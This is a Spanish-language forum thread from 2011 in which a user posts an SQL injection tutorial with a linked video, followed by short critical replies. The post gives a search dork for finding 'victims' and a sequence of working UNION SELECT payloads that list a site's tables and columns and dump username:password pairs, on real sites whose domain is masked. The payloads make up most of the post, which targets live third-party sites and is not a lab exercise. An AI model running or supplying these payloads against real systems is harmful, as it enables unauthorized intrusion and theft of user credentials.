sqli+bug+exploit=videotuto

Iniciado por ruben_linux, 25 Agosto 2011, 23:47 PM

0 Miembros y 1 Visitante están viendo este tema.

ruben_linux

Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

+and+1=0

3.- buscamos union select

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--

4.- buscamos las tablas

Citarhttp://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citarhttp://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--
vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

[youtube=425,350]http://www.youtube.com/watch?v=uuEbGos9Cwg[/youtube]

Shell Root

1. No tiene nada de nuevo.
2. No creo que sea necesario ponerle el hosting.
3. ...
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

‭lipman

Interesante.. pero dejame decirte que creo que no está permitido publicar la web vulnerable cuando se hacen este tipo de cosas.

De todos modos, no es que esté muy explicado que digamos =/

WarGhost

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)
¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

ruben_linux

Cita de: WarGhost en 26 Agosto 2011, 02:54 AM
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)

Gracias WarGhost. Ya lo cambie.